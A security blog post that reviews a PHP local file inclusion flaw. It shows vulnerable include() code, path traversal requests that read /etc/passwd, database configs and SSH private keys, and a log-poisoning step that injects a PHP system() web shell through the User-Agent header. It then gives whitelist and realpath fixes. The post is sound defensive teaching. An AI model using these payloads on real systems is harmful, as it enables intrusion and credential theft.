Code Review: Local File Inclusion via Unsanitized User Input

Most LFI vulnerabilities don’t come from complex logic. They come from a single line of code where a developer trusted user input they never should have.

This one is a classic — a PHP application that dynamically loads page templates based on a URL parameter. Clean, maintainable code on the surface. A complete disaster underneath.

The Code

<?php

function loadPage($page) {
    $basePath = '/var/www/html/pages/';
    $file = $basePath . $page;
    
    if (file_exists($file)) {
        include($file);
    } else {
        echo "Page not found.";
    }
}

$page = $_GET['page'];
loadPage($page);

?>

Read it carefully. The vulnerability is right there in plain sight.

Breaking It Down

The intent is simple — load a page template based on a URL parameter:

https://target.com/index.php?page=home.php
https://target.com/index.php?page=contact.php
https://target.com/index.php?page=about.php

The developer assumed users would only ever pass valid page names. They built the happy path and never considered what an attacker would send instead.

Here’s the flow:

$_GET['page'] takes the page parameter directly from the URL — no sanitization, no validation
It gets concatenated directly onto $basePath — no path normalization
file_exists() checks if the resulting path exists — any valid path on the filesystem passes this check
include() loads and executes the file — including files way outside the intended directory

The Vulnerability — Path Traversal + LFI

Because $page is never sanitized, an attacker can use ../ sequences to traverse up the directory tree and reach any file on the server.

Attack 1 — Read /etc/passwd:

GET /index.php?page=../../../../etc/passwd

The resolved path becomes:

/var/www/html/pages/../../../../etc/passwd
→ /etc/passwd

file_exists() returns true. include() reads and outputs the entire file.

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
...

Attack 2 — Read application config with database credentials:

GET /index.php?page=../config/database.php

Resolved path:

/var/www/html/pages/../config/database.php
→ /var/www/html/config/database.php

If database.php contains hardcoded credentials — and it usually does — the attacker now has the database username, password, and host.

Attack 3 — Read SSH private keys:

GET /index.php?page=../../../../home/deploy/.ssh/id_rsa

Private key exfiltrated. Game over.

Why `file_exists()` Doesn’t Help

A common misconception is that checking file_exists() before including provides some protection. It doesn’t.

file_exists() returns true for any file that exists on the filesystem — not just files in the intended directory. It’s a filesystem check, not a security control. All it does here is avoid a PHP warning. An attacker only needs to target files that actually exist, which is trivially easy.

Going Further — LFI to RCE

In certain conditions, LFI can be escalated to Remote Code Execution:

Log Poisoning — if the attacker can write to a log file (e.g. Apache access log via a crafted User-Agent header) and then include that log file through the LFI, any PHP code in the log gets executed:

GET /index.php HTTP/1.1
User-Agent: <?php system($_GET['cmd']); ?>

Then:

GET /index.php?page=../../../../var/log/apache2/access.log&cmd=id

The PHP code embedded in the log executes and returns command output. LFI just became RCE.

Root Cause

One line is responsible for everything:

$page = $_GET['page'];  // ← raw user input, zero validation

The developer made two assumptions that attackers invalidate immediately:

Users will only pass filenames, not directory traversal sequences
The base path prefix provides containment — it doesn’t

The Fix

Fix 1 — Whitelist allowed pages:

<?php

function loadPage($page) {
    // Define exactly which pages are allowed — nothing else
    $allowedPages = ['home', 'about', 'contact', 'services'];
    
    if (!in_array($page, $allowedPages, true)) {
        http_response_code(404);
        echo "Page not found.";
        return;
    }
    
    $basePath = '/var/www/html/pages/';
    $file = $basePath . $page . '.php';
    include($file);
}

$page = $_GET['page'] ?? 'home';
loadPage($page);

?>

Fix 2 — Resolve the real path and validate it stays within the base directory:

<?php

function loadPage($page) {
    $basePath = realpath('/var/www/html/pages/');
    $requestedPath = realpath($basePath . '/' . $page);
    
    // Ensure the resolved path starts with the base path
    if ($requestedPath === false || strpos($requestedPath, $basePath) !== 0) {
        http_response_code(403);
        echo "Access denied.";
        return;
    }
    
    include($requestedPath);
}

$page = $_GET['page'] ?? 'home';
loadPage($page);

?>

realpath() resolves all ../ sequences to their actual filesystem path. The strpos() check then confirms the resolved path still lives inside the intended base directory. If it doesn’t — request denied.

Apply both fixes together. The whitelist prevents unknown filenames. The realpath() check prevents traversal even if the whitelist is somehow bypassed.

Key Takeaways

Never pass user input directly to include(), require(), fopen(), or any filesystem function — always validate first
file_exists() is not a security control — it checks existence, not authorization
Whitelisting is always stronger than blacklisting — define what’s allowed, reject everything else
realpath() is your friend — it collapses traversal sequences before you validate the path
LFI is not just information disclosure — in the right conditions it escalates to full RCE via log poisoning or file upload chaining

Found this useful? More code reviews coming. Hit me up on X if you want to discuss.